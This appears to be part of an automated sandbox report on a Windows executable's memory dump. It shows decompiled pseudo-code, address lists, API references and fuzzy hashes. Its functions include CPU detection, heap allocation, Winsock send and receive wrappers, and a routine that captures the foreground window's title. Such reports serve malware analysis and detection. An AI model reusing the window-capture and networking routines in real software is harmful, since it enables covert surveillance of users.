						E0043205A( &_v20, 0x467c9c);
						asm("int3");
						_push(_t133);
						_t134 = _t137;
						E0042F962( &_v36);
						E0043205A( &_v36, 0x467cd4);
						asm("int3");
						_push(_t134);
						 *0x46ad0c =  *0x46ad0c & 0x00000000;
						 *0x46a010 =  *0x46a010 | 1;
						_t71 = IsProcessorFeaturePresent(0xa);
						__eflags = _t71;
						if(_t71 != 0) {
							_v32 = _v32 & 0x00000000;
							 *0x46a010 =  *0x46a010 | 0x00000002;
							_push(_t127);
							 *0x46ad0c = 1;
							_t122 =  &_v56;
							_push(1);
							asm("cpuid");
							_pop(_t97);
							 *_t122 = 0;
							 *((intOrPtr*)(_t122 + 4)) = 1;
							 *((intOrPtr*)(_t122 + 8)) = 0;
							 *(_t122 + 0xc) = _t120;
							_v24 = _v56;
							__eflags = _v44 ^ 0x49656e69 | _v48 ^ 0x6c65746e | _v52 ^ 0x756e6547;
							_t79 = 1;
							_t112 = 0;
							_push(1);
							asm("cpuid");
							_pop(_t98);
							 *_t122 = _t79;
							 *((intOrPtr*)(_t122 + 4)) = _t97;
							 *((intOrPtr*)(_t122 + 8)) = _t112;
							 *(_t122 + 0xc) = _t120;
							if((_v44 ^ 0x49656e69 | _v48 ^ 0x6c65746e | _v52 ^ 0x756e6547) != 0) {
								L21:
								_t123 =  *0x46ad10; // 0x2
							} else {
								_t90 = _v56 & 0x0fff3ff0;
								__eflags = _t90 - 0x106c0;
								if(_t90 == 0x106c0) {
									L20:
									_t126 =  *0x46ad10; // 0x2
									_t123 = _t126 | 0x00000001;
									 *0x46ad10 = _t123;
								} else {
									__eflags = _t90 - 0x20660;
									if(_t90 == 0x20660) {
										goto L20;
									} else {
										__eflags = _t90 - 0x20670;
										if(_t90 == 0x20670) {
											goto L20;
										} else {
											__eflags = _t90 - 0x30650;
											if(_t90 == 0x30650) {
												goto L20;
											} else {
												__eflags = _t90 - 0x30660;
												if(_t90 == 0x30660) {
													goto L20;
												} else {
													__eflags = _t90 - 0x30670;
													if(_t90 != 0x30670) {
														goto L21;
													} else {
														goto L20;
													}
												}
											}
										}
									}
								}
							}
							__eflags = _v24 - 7;
							_v40 = _v44;
							_t81 = _v48;
							_v20 = _t81;
							_v36 = _t81;
							if(_v24 >= 7) {
								_t87 = 7;
								_push(_t98);
								asm("cpuid");
								_t100 =  &_v56;
								 *_t100 = _t87;
								 *((intOrPtr*)(_t100 + 4)) = _t98;
								 *((intOrPtr*)(_t100 + 8)) = 0;
								 *(_t100 + 0xc) = _t120;
								_t88 = _v52;
								__eflags = _t88 & 0x00000200;
								_v32 = _t88;
								_t81 = _v20;
								if((_t88 & 0x00000200) != 0) {
									_t125 = _t123 | 0x00000002;
									__eflags = _t125;
									 *0x46ad10 = _t125;
								}
							}
							__eflags = _t81 & 0x00100000;
							if((_t81 & 0x00100000) != 0) {
								 *0x46a010 =  *0x46a010 | 0x00000004;
								 *0x46ad0c = 2;
								__eflags = _t81 & 0x08000000;
								if((_t81 & 0x08000000) != 0) {
									__eflags = _t81 & 0x10000000;
									if((_t81 & 0x10000000) != 0) {
										asm("xgetbv");
										_v28 = _t81;
										_v24 = _t120;
										__eflags = (_v28 & 0x00000006) - 6;
										if((_v28 & 0x00000006) == 6) {
											__eflags = 0;
											if(0 == 0) {
												_t84 =  *0x46a010; // 0x2f
												_t85 = _t84 | 0x00000008;
												 *0x46ad0c = 3;
												__eflags = _v32 & 0x00000020;
												 *0x46a010 = _t85;
												if((_v32 & 0x00000020) != 0) {
													_t86 = _t85 | 0x00000020;
													__eflags = _t86;
													 *0x46ad0c = 5;
													 *0x46a010 = _t86;
												}
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}

0x00401649
0x0040164e
0x00401654
0x00401659
0x0040165c
0x0040165e
0x00401665
0x00401669
0x0040166d
0x00401690
0x00401691
0x00401697
0x00000000
0x0040166f
0x0040166f
0x00401675
0x00000000
0x00401677
0x00401677
0x0040167a
0x0040167c
0x00000000
0x0040167e
0x0040167f
0x00401685
0x00401688
0x0040168b
0x00401699
0x0040169c
0x0040169c
0x0040167c
0x00401675
0x00401660
0x00401660
0x0042f97b
0x0042f97d
0x0042f983
0x0042f991
0x0042f996
0x0042f997
0x0042f998
0x0042f9a0
0x0042f9ae
0x0042f9b3
0x0042f9b4
0x0042f9b7
0x0042f9c5
0x0042f9cd
0x0042f9d2
0x0042f9d4
0x0042f9da
0x0042f9e0
0x0042f9e9
0x0042f9eb
0x0042f9f1
0x0042f9f4
0x0042f9f5
0x0042f9f9
0x0042f9fa
0x0042f9fc
0x0042f9ff
0x0042fa02
0x0042fa0b
0x0042fa28
0x0042fa2a
0x0042fa2d
0x0042fa2e
0x0042fa2f
0x0042fa33
0x0042fa34
0x0042fa36
0x0042fa39
0x0042fa3c
0x0042fa3f
0x0042fa84
0x0042fa84
0x0042fa41
0x0042fa44
0x0042fa49
0x0042fa4e
0x0042fa73
0x0042fa73
0x0042fa79
0x0042fa7c
0x0042fa50
0x0042fa50
0x0042fa55
0x00000000
0x0042fa57
0x0042fa57
0x0042fa5c
0x00000000
0x0042fa5e
0x0042fa5e
0x0042fa63
0x00000000
0x0042fa65
0x0042fa65
0x0042fa6a
0x00000000
0x0042fa6c
0x0042fa6c
0x0042fa71
0x00000000
0x00000000
0x00000000
0x00000000
0x0042fa71
0x0042fa6a
0x0042fa63
0x0042fa5c
0x0042fa55
0x0042fa4e
0x0042fa8a
0x0042fa91
0x0042fa94
0x0042fa97
0x0042fa9a
0x0042fa9d
0x0042faa1
0x0042faa4
0x0042faa5
0x0042faaa
0x0042faad
0x0042faaf
0x0042fab2
0x0042fab5
0x0042fab8
0x0042fabb
0x0042fac0
0x0042fac3
0x0042fac6
0x0042fac8
0x0042fac8
0x0042facb
0x0042facb
0x0042fac6
0x0042fad3
0x0042fad8
0x0042fada
0x0042fae1
0x0042faeb
0x0042faf0
0x0042faf2
0x0042faf7
0x0042fafb
0x0042fafe
0x0042fb01
0x0042fb0f
0x0042fb12
0x0042fb14
0x0042fb16
0x0042fb18
0x0042fb1d
0x0042fb20
0x0042fb2a
0x0042fb2e
0x0042fb33
0x0042fb35
0x0042fb35
0x0042fb38
0x0042fb42
0x0042fb42
0x0042fb33
0x0042fb16
0x0042fb12
0x0042faf7
0x0042faf0
0x0042fad8
0x0042fb47
0x0042fb4d
0x0042fb4d
0x00401650
0x00401653
0x00401653

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78e0c05a8bcd0e5a2d91a04ac3c4150d1433fd0d4609d8fa5bf44bc2a10101cf
Instruction ID: 14bc11751579f6a418080d33961eb9a75802e287542bdf943e450bbe308a60cc
Opcode Fuzzy Hash: 78e0c05a8bcd0e5a2d91a04ac3c4150d1433fd0d4609d8fa5bf44bc2a10101cf
Instruction Fuzzy Hash: BCF0B4712142085BCB0C9E34AC91BBA375D5B11368BA44B7FF02EDA1E1D73BD984824C

Uniqueness

Uniqueness Score: -1.00%

Function 0043CFE1, Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0043CFE1(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t15;
				signed int _t16;

				if( *0x46b4d0 == 0) {
					_push(_t15);
					E004472D9(__ecx); // executed
					_t2 = E004475DA(); // executed
					_t19 = _t2;
					if(_t2 != 0) {
						_t3 = E0043D08E(__ebx, _t19); // executed
						if(_t3 != 0) {
							 *0x46b4dc = _t3;
							E00442853(0x46b4d0, _t3);
							_t16 = 0;
						} else {
							_t16 = _t15 | 0xffffffff;
						}
						E004401F5(0);
					} else {
						_t16 = _t15 | 0xffffffff;
					}
					E004401F5(_t19);
					return _t16;
				} else {
					return 0;
				}
			}

0x0043cfe8
0x0043cfee
0x0043cfef
0x0043cff4
0x0043cff9
0x0043cffd
0x0043d005
0x0043d00d
0x0043d01a
0x0043d01f
0x0043d024
0x0043d00f
0x0043d00f
0x0043d00f
0x0043d028
0x0043cfff
0x0043cfff
0x0043cfff
0x0043d02f
0x0043d039
0x0043cfea
0x0043cfec
0x0043cfec

APIs

_free.LIBCMT ref: 0043D02F

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 18f2041ca1429938108e02d2a53756847af81262eafccf0d74fd8bb75016ea07
Instruction ID: fba902ad4ccf31a8b90f9fdf44a17567959da2f799f45fbd848029ef9f978f3d
Opcode Fuzzy Hash: 18f2041ca1429938108e02d2a53756847af81262eafccf0d74fd8bb75016ea07
Instruction Fuzzy Hash: 56E0A02290541160E239363B7C0565B0265CBC973DF10432BF624C62C2EFAC884341AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041719C, Relevance: 3.0, APIs: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041719C(void* __ecx) {
				short _v516;
				struct HWND__* _t3;
				void* _t8;
				void* _t12;

				_t12 = __ecx; // executed
				_t3 = GetForegroundWindow(); // executed
				GetWindowTextW(_t3,  &_v516, 0x200);
				E0040427F(_t8, _t12,  &_v516);
				return _t12;
			}

0x004171a6
0x004171a8
0x004171bb
0x004171ca
0x004171d5

APIs

GetForegroundWindow.USER32 ref: 004171A8
GetWindowTextW.USER32 ref: 004171BB

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$ForegroundText
String ID:
API String ID: 29597999-0
Opcode ID: de6f372f724c64eaa2c7ed6c2aac536a81d6c43785f51a9ef177bda7df55ad17
Instruction ID: aaff8fddf6ef76f16923c3f9de4e1078fffc563957b707b355cfa3dba45694d1
Opcode Fuzzy Hash: de6f372f724c64eaa2c7ed6c2aac536a81d6c43785f51a9ef177bda7df55ad17
Instruction Fuzzy Hash: 2ED0C231A0032867EA206BE49C4DFA5772C9704B42F0001AABD14D3182DD74990487D4

Uniqueness

Uniqueness Score: -1.00%

Function 00402D0D, Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402D0D(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				unsigned int _t29;
				signed int _t34;
				void* _t38;
				void* _t42;
				void* _t43;
				signed int _t49;
				intOrPtr _t52;
				unsigned int _t55;
				unsigned int _t71;
				signed int _t77;
				void* _t79;
				void* _t81;

				_t52 = __ecx;
				E004510A8(E00452604, _t79);
				 *((intOrPtr*)(_t79 - 0x10)) = _t81 - 0x10;
				_t73 = _t52;
				 *((intOrPtr*)(_t79 - 0x18)) = _t52;
				_t77 =  *(_t79 + 8) | 0x0000000f;
				_t49 = L00402E4C(_t52);
				if(_t49 >= _t77) {
					_t29 =  *(E004027B5());
					 *(_t79 - 0x1c) = _t29;
					_t55 = _t29 >> 1;
					 *(_t79 - 0x14) = 3;
					if(_t55 > _t77 /  *(_t79 - 0x14)) {
						_t71 =  *(_t79 - 0x1c);
						_t77 = _t55 + _t71;
						if(_t71 > _t49 - _t55) {
							_t77 = _t49;
						}
					}
				} else {
					_t77 =  *(_t79 + 8);
				}
				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
				_t17 = _t77 + 1; // 0x1
				E0040220E(_t73);
				_t34 = E00402EC0(_t17); // executed
				 *(_t79 - 0x14) = _t34;
				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
				_t50 =  *((intOrPtr*)(_t79 + 0xc));
				if( *((intOrPtr*)(_t79 + 0xc)) != 0) {
					_t43 = E00402248(_t73);
					E004015F7(E0040312F( *(_t79 - 0x14)), _t43, _t50);
				}
				E004023D8(_t50, _t73, 1, 0); // executed
				_t38 = E0040312F(E0040213C(_t73));
				E004031A7(E0040220E(_t73), _t38, _t79 - 0x14);
				 *(E004027B5()) = _t77;
				_t42 = E00402990(_t50);
				 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
				return _t42;
			}

0x00402d0d
0x00402d12
0x00402d1d
0x00402d20
0x00402d22
0x00402d28
0x00402d30
0x00402d34
0x00402d42
0x00402d44
0x00402d49
0x00402d4f
0x00402d5b
0x00402d61
0x00402d66
0x00402d69
0x00402d6b
0x00402d6b
0x00402d69
0x00402d36
0x00402d36
0x00402d36
0x00402d6d
0x00402d71
0x00402d77
0x00402d7e
0x00402d83
0x00402d86
0x00402dc4
0x00402dc9
0x00402dce
0x00402dde
0x00402de3
0x00402dec
0x00402dfd
0x00402e0d
0x00402e19
0x00402e1e
0x00402e26
0x00402e33

APIs

__EH_prolog.LIBCMT ref: 00402D12

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 944fb353753fac14d10f0a7ff01711820957b56d157fc21c1c4a6115c61adfc2
Instruction ID: e6e99268b29485b263ac33084d07fd67f49e3475c5b5c63b65d8ccfcab0936ee
Opcode Fuzzy Hash: 944fb353753fac14d10f0a7ff01711820957b56d157fc21c1c4a6115c61adfc2
Instruction Fuzzy Hash: 1B218571B001055BCB14EFB6858A6BE77AAAF84314F10403FE415BB2C2DBBC5E019799

Uniqueness

Uniqueness Score: -1.00%

Function 00404AA4, Relevance: 1.6, APIs: 1, Instructions: 65
networkCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00404AA4(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v32;
				void* __edi;
				void* _t27;
				void* _t29;
				void* _t55;

				_t55 = __ecx;
				_t3 = E00402489() + 4; // 0x4
				E0040524E(__ebx,  &_v32, __edx, __ecx, 0xc, 0);
				 *((intOrPtr*)(E00405220(0))) =  *((intOrPtr*)(_t55 + 0x3c));
				 *((intOrPtr*)(E00405220(4))) = _t3;
				 *((intOrPtr*)(E00405220(8))) = _a4;
				E00403436( &_a8);
				if( *((char*)(_t55 + 1)) != 0) {
					_push( &_v32);
					_t27 = E00402489();
					_t29 = E0041C86F( *((intOrPtr*)(_t55 + 0x44)), L00401F95( &_v32), _t27); // executed
				} else {
					_t29 = L00401F95( &_v32);
					__imp__#19( *((intOrPtr*)(_t55 + 4)), _t29, E00402489(), 0);
				}
				E00401FC7();
				E00401FC7();
				return _t29;
			}

0x00404aac
0x00404abd
0x00404ac0
0x00404ad4
0x00404ae3
0x00404aed
0x00404af6
0x00404aff
0x00404b20
0x00404b24
0x00404b37
0x00404b01
0x00404b0f
0x00404b18
0x00404b18
0x00404b43
0x00404b4b
0x00404b57

APIs

send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: a8901e1461b86aa7a85217045e2ebfb96c64ec8441432215c30d957f45cac48d
Instruction ID: b7cc105376a0c6c17fc0074abac2d673c8eb48d7e6be34cea40eb70dca5961eb
Opcode Fuzzy Hash: a8901e1461b86aa7a85217045e2ebfb96c64ec8441432215c30d957f45cac48d
Instruction Fuzzy Hash: 7E214F7190020AABC705FB51E856FEEB778AF10304F10817FA5127B1E1DF78A905CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00422179, Relevance: 1.5, APIs: 1, Instructions: 44
networkCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00422179(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _t8;
				void* _t10;
				void* _t16;
				signed int _t17;
				void* _t19;

				_t8 = E00422251(_a4,  *_a16, _a8, _a12,  *((intOrPtr*)(_a4 + 0x1fc))); // executed
				if(_t8 >= 0) {
					_t16 = 0xfffffffb;
					_t9 =  ==  ? _t16 : _t8;
					return  ==  ? _t16 : _t8;
				} else {
					L00422173();
					_t17 = _t8;
					if(_t17 == 0x2733 || _t17 == 0x274c) {
						_push(0xfffffffe);
						goto L9;
					} else {
						if(_t17 != 0x2746) {
							if(_t17 != 0x2714) {
								_t19 = 0xfffffffb;
								_t12 =  ==  ? _t19 : _t8 | 0xffffffff;
								return  ==  ? _t19 : _t8 | 0xffffffff;
							} else {
								_push(0xfffffffc);
								goto L9;
							}
						} else {
							_push(0xfffffffd);
							L9:
							_pop(_t10);
							return _t10;
						}
					}
				}
			}

0x00422190
0x00422199
0x004221e4
0x004221e5
0x004221e9
0x0042219b
0x0042219b
0x004221a0
0x004221a8
0x004221db
0x00000000
0x004221b2
0x004221b8
0x004221c4
0x004221d5
0x004221d6
0x004221da
0x004221c6
0x004221c6
0x00000000
0x004221c6
0x004221ba
0x004221ba
0x004221dd
0x004221dd
0x004221df
0x004221df
0x004221b8
0x004221a8

APIs

Part of subcall function 00422251: recv.WS2_32(?,?,?,?), ref: 0042225C

WSAGetLastError.WS2_32 ref: 0042219B

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLastrecv
String ID:
API String ID: 2514157807-0
Opcode ID: 775403e6fa1c86be6d548b2784bdb667b06ff57a934a787a42b00bd7c27719c5
Instruction ID: 5fd3ebf0e0d9901e6086a92a38d31c1d4f4930f82062b2ddb0320275891adbe9
Opcode Fuzzy Hash: 775403e6fa1c86be6d548b2784bdb667b06ff57a934a787a42b00bd7c27719c5
Instruction Fuzzy Hash: B7F0A43230C1297A9F189959FE94C7933459F85374BB0436BFE3AC65F0EA6998602149

Uniqueness

Uniqueness Score: -1.00%

Function 0043F348, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0043F348(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x46ba48, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = L0043ED9A();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0043A504())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E0043C819(_t15, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x0043f348
0x0043f34e
0x0043f353
0x0043f361
0x0043f361
0x0043f367
0x0043f369
0x0043f369
0x0043f380
0x0043f389
0x0043f391
0x00000000
0x00000000
0x0043f371
0x0043f373
0x0043f395
0x0043f39a
0x0043f3a0
0x00000000
0x0043f3a0
0x0043f376
0x0043f37b
0x0043f37c
0x0043f37e
0x00000000
0x00000000
0x0043f37e
0x00000000
0x0043f380
0x0043f359
0x0043f35f
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00441D97,00000001,00000364,?,00000000,00000000,004368F8,00000000,?,?,0043697C,00000000), ref: 0043F389

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e21e4b0bf605aaaf0e10b68ce74f52e963093a8405524f63b13cd602651aef51
Instruction ID: 680b6e8bc4c2fa124abf68bcdd5a812fa191381f72dfdd1accecd8568f1e318d
Opcode Fuzzy Hash: e21e4b0bf605aaaf0e10b68ce74f52e963093a8405524f63b13cd602651aef51
Instruction Fuzzy Hash: 8AF0E931A00321AADF216A639C45B5B3788AF4D7B1F15A037FC04DB690DA3CDC5986ED

Uniqueness

Uniqueness Score: -1.00%

Function 004221EA, Relevance: 1.5, APIs: 1, Instructions: 38
networkCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004221EA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _t8;
				void* _t9;
				signed int _t15;
				void* _t17;

				_t8 = E0042226A(_a4,  *_a16, _a8, _a12,  *((intOrPtr*)(_a4 + 0x200))); // executed
				if(_t8 >= 0) {
					return _t8;
				} else {
					L00422173();
					_t15 = _t8;
					if(_t15 == 0x2733 || _t15 == 0x274c) {
						_push(0xfffffffe);
						L9:
						_pop(_t9);
						return _t9;
					}
					if(_t15 == 0x2746) {
						_push(0xfffffffd);
						goto L9;
					}
					if(_t15 == 0x2714) {
						_push(0xfffffffc);
						goto L9;
					}
					_t17 = 0xfffffffb;
					_t11 =  ==  ? _t17 : _t8 | 0xffffffff;
					return  ==  ? _t17 : _t8 | 0xffffffff;
				}
			}

0x00422201
0x0042220a
0x00422250
0x0042220c
0x0042220c
0x00422211
0x00422219
0x0042224c
0x0042224e
0x0042224e
0x00000000
0x0042224e
0x00422229
0x0042222b
0x00000000
0x0042222b
0x00422235
0x00422237
0x00000000
0x00422237
0x00422246
0x00422247
0x0042224b
0x0042224b

APIs

Part of subcall function 0042226A: send.WS2_32(?,?,?,?), ref: 00422275

WSAGetLastError.WS2_32 ref: 0042220C

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLastsend
String ID:
API String ID: 1802528911-0
Opcode ID: 8cb09f3eb5d4e7103086a5d97c8df369fda03b4f8b26fdb2e33335adb8823741
Instruction ID: 207b8048d6da47c8d3e1bf0cf2b23625c58979fe3f9e08f58dd8cb8bfe01de6d
Opcode Fuzzy Hash: 8cb09f3eb5d4e7103086a5d97c8df369fda03b4f8b26fdb2e33335adb8823741
Instruction Fuzzy Hash: 19F0BB3530C534FADF18995CFE548393341AF45330B70439BF939866F0DA6E5850917A

Uniqueness

Uniqueness Score: -1.00%

Function 0043F98C, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0043F98C(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0043A504())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x46ba48, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = L0043ED9A();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E0043C819(_t7, _t8, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x0043f98c
0x0043f992
0x0043f998
0x0043f9ca
0x0043f9cf
0x0043f9d5
0x00000000
0x0043f9d5
0x0043f99c
0x0043f99e
0x0043f99e
0x0043f9b5
0x0043f9be
0x0043f9c6
0x00000000
0x00000000
0x0043f9a6
0x0043f9a8
0x00000000
0x00000000
0x0043f9ab
0x0043f9b0
0x0043f9b1
0x0043f9b3
0x00000000
0x00000000
0x0043f9b3
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 20626a587c955ce6a9034e6f34a1cf2dbef27dc7ff66e29b306da7decd8106d9
Instruction ID: 400f104e77b540acbfcd3781324d28ce3e91d9a3d9d75f8370708e8767061156
Opcode Fuzzy Hash: 20626a587c955ce6a9034e6f34a1cf2dbef27dc7ff66e29b306da7decd8106d9
Instruction Fuzzy Hash: 01E02BB290022177DB2126625C0075B36489F5D7B1F103037FD05922C0DB6CCC0582EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040498B, Relevance: 1.5, APIs: 1, Instructions: 30
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040498B(char* __ecx) {
				intOrPtr _t8;
				char _t13;
				char* _t14;

				_t14 = __ecx;
				if( *0x46baab != 0) {
					L3:
					__imp__#23(0, 1, 6); // executed
					 *((intOrPtr*)(_t14 + 4)) = _t8;
					if(_t8 == 0xffffffff) {
						L2:
						return 0;
					}
					_t13 =  *0x46bae0; // 0x1
					 *((char*)(_t14 + 0x50)) = 0;
					 *((intOrPtr*)(_t14 + 0x54)) = 0;
					 *((intOrPtr*)(_t14 + 0x4c)) = 0x3e8;
					 *((char*)(_t14 + 0x65)) = 0;
					 *((char*)(_t14 + 1)) = _t13;
					 *((intOrPtr*)(_t14 + 0x44)) = 0;
					 *_t14 = 1;
					return 1;
				}
				_t8 = E004049DE(); // executed
				if(_t8 != 0) {
					goto L3;
				}
				goto L2;
			}

0x00404994
0x00404996
0x004049a5
0x004049ac
0x004049b2
0x004049b8
0x004049a1
0x00000000
0x004049a1
0x004049ba
0x004049c2
0x004049c5
0x004049c8
0x004049cf
0x004049d2
0x004049d5
0x004049d8
0x00000000
0x004049d8
0x00404998
0x0040499f
0x00000000
0x00000000
0x00000000

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 004049AC

Part of subcall function 004049DE: WSAStartup.WS2_32(00000202,00000000), ref: 004049F3

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Startupsocket
String ID:
API String ID: 3996037109-0
Opcode ID: 57e39759065e94ff74e98b7e35a5d3c8348f39f3f93ca1ad8d88c95b428a27d8
Instruction ID: 643c1d6dd67993fbe743bd4810411797e70fdf622d87f5941d6678f6439cf7cf
Opcode Fuzzy Hash: 57e39759065e94ff74e98b7e35a5d3c8348f39f3f93ca1ad8d88c95b428a27d8
Instruction Fuzzy Hash: 68F0BEF10057905AE7314F344880393BFD45B52318F14897FE6D2A3BC2C2B9A819C76A

Uniqueness

Uniqueness Score: -1.00%

Function 00404B5A, Relevance: 1.5, APIs: 1, Instructions: 21
networkCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00404B5A(intOrPtr _a4, intOrPtr _a8) {
				void* __ecx;
				void* _t8;
				void* _t9;
				void* _t10;

				if( *((char*)(_t10 + 1)) == 0) {
					_t7 = _t10 + 4; // 0xffffffff
					__imp__#16( *_t7, _a4, _a8, 0);
					return _t8;
				}
				_push(_t10);
				_t4 = _t10 + 0x44; // 0x0, executed
				_t9 = E0041C8AB( *_t4, _a4, _a8); // executed
				return _t9;
			}

0x00404b62
0x00404b7f
0x00404b82
0x00000000
0x00404b82
0x00404b67
0x00404b6b
0x00404b6e
0x00000000

APIs

recv.WS2_32(FFFFFFFF,0046BACC,?,00000000), ref: 00404B82

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: f51da9c7f7a354ed60f7591d544108ff1c1d334abc874874dee1a6f4a1b8aa5d
Instruction ID: f3ec6d8f34401422f244b447c80db10cf3c514e603278a65c5bd388ab48e0435
Opcode Fuzzy Hash: f51da9c7f7a354ed60f7591d544108ff1c1d334abc874874dee1a6f4a1b8aa5d
Instruction Fuzzy Hash: 2DE08672048204BFDB056F40DC46FA97F29DB54765F24C11EFA08191A2DB33F552D748

Uniqueness

Uniqueness Score: -1.00%

Function 004049DE, Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 004049F3

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 89c49b222f636443e58f1b3fbdfa0b01495877bced7cab345007ae3e0c4764c4
Instruction ID: 820ae791bcbb1d2b57b63688d1298c64991293a60e6d01c8c57279511ad2648c
Opcode Fuzzy Hash: 89c49b222f636443e58f1b3fbdfa0b01495877bced7cab345007ae3e0c4764c4
Instruction Fuzzy Hash: 59D0123255861C4ED611AAB4AD0F8A5B76CC313A12F4003BAACB5C25D3F650572CC2FB

Uniqueness

Uniqueness Score: -1.00%

Function 004027D1, Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

